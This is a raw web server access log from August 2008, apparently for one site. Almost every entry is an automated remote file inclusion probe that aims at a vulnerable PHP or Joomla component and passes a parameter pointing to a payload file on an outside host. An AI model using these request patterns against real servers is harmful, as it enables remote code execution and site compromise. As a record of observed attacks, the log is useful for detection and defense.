83.103.23.40 - - [10/Aug/2008:09:13:36 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:09:13:37 -0700] "GET /logs/access_080125.log/?sourceFolder=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:09:13:39 -0700] "GET /?sourceFolder=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 18387 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.154.47 - - [10/Aug/2008:09:13:40 -0700] "GET /logs/?sourceFolder=http://www.posidynegroup.com/.../image.txt? HTTP/1.1" 200 59997 "-" "libwww-perl/5.810" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:13:48 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [10/Aug/2008:09:13:59 -0700] "GET /logs/naboard_pnr.php?skin=http://kongress-und-kommunikation.com/html/modules/sitemap/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [10/Aug/2008:09:14:00 -0700] "GET /naboard_pnr.php?skin=http://kongress-und-kommunikation.com/html/modules/sitemap/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:14:39 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:14:46 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:14:46 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:14:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:14:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [10/Aug/2008:09:14:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:15:02 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:15:07 -0700] "GET /logs/access_080218.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:09:15:26 -0700] "GET /logs/access_080324.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:15:30 -0700] "GET /logs/access_080226.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.82.247.252 - - [10/Aug/2008:09:15:32 -0700] "GET /logs/access_080329.log%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:15:37 -0700] "GET /logs/access_080724.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.84.31 - - [10/Aug/2008:09:16:23 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:16:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:09:16:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:09:16:44 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:09:16:44 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:09:16:44 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:09:16:56 -0700] "GET /logs/access_080125.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.224.152.230 - - [10/Aug/2008:09:17:01 -0700] "GET /logs//adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [10/Aug/2008:09:17:01 -0700] "GET //adodbt/sql.php?classes_dir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:17:27 -0700] "GET /logs/access_080320.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:17:27 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:17:27 -0700] "GET /logs/access_080311.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:17:28 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 200 18665 "-" "libwww-perl/5.808" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:09:17:41 -0700] "GET /logs/access_080321.log/include/write.php?dir=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:09:17:41 -0700] "GET /include/write.php?dir=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:09:17:42 -0700] "GET /logs/include/write.php?dir=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:17:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:17:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:18:12 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:18:12 -0700] "GET /logs/access_080320.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:18:13 -0700] "GET /logs/access_080311.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:18:14 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 200 18697 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:19:11 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:19:12 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:09:19:22 -0700] "GET /logs/access_080515.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:09:19:34 -0700] "GET //admin.php?lang=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.84.182.98 - - [10/Aug/2008:09:19:34 -0700] "GET /logs//admin.php?lang=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:09:20:00 -0700] "GET /logs/index.php?show=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:20:00 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:09:20:00 -0700] "GET /logs/access_080209.log/index.php?show=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:20:01 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.70.145.159 - - [10/Aug/2008:09:20:01 -0700] "GET /index.php?show=http://www.energobalt-spb.ru/error_log?%0D?? HTTP/1.1" 200 54499 "-" "libwww-perl/5.800" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:20:08 -0700] "GET /logs/access_080215.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:20:08 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:20:08 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 200 18697 "-" "libwww-perl/5.808" "www.dmulk.com"
64.119.182.156 - - [10/Aug/2008:09:20:10 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:20:30 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 60002 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [10/Aug/2008:09:20:33 -0700] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.64" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:20:48 -0700] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:20:55 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 200 60002 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:20:59 -0700] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:09:21:49 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:09:21:49 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:09:21:49 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:21:59 -0700] "GET /logs/access_080124.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.207.106.54 - - [10/Aug/2008:09:22:04 -0700] "GET /logs/access_080311.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:09:22:14 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:22:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:22:15 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:22:16 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:22:22 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:09:22:22 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:22:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 200 60002 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:22:48 -0700] "GET //?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.230.178 - - [10/Aug/2008:09:22:53 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:09:23:00 -0700] "GET ///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:23:25 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.172.23 - - [10/Aug/2008:09:23:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:27 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:27 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:28 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:28 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:28 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:24:38 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:24:40 -0700] "GET /logs/access_080215.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:24:40 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:24:43 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 200 18697 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:24:57 -0700] "GET /logs/access_080127.log/index.php?page=setup&checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:58 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [10/Aug/2008:09:24:58 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:25:01 -0700] "GET /index.php?page=setup&checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 200 18419 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.136 - - [10/Aug/2008:09:25:03 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.babaclip.com/plugins/safehtml/filess/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:25:03 -0700] "GET /logs/index.php?page=setup&checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.137.59.42 - - [10/Aug/2008:09:25:04 -0700] "GET /logs/access_080114.log/index.php?page=setup&checkmodus=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:09 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:09 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:10 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.25.54.205 - - [10/Aug/2008:09:25:11 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [10/Aug/2008:09:26:30 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
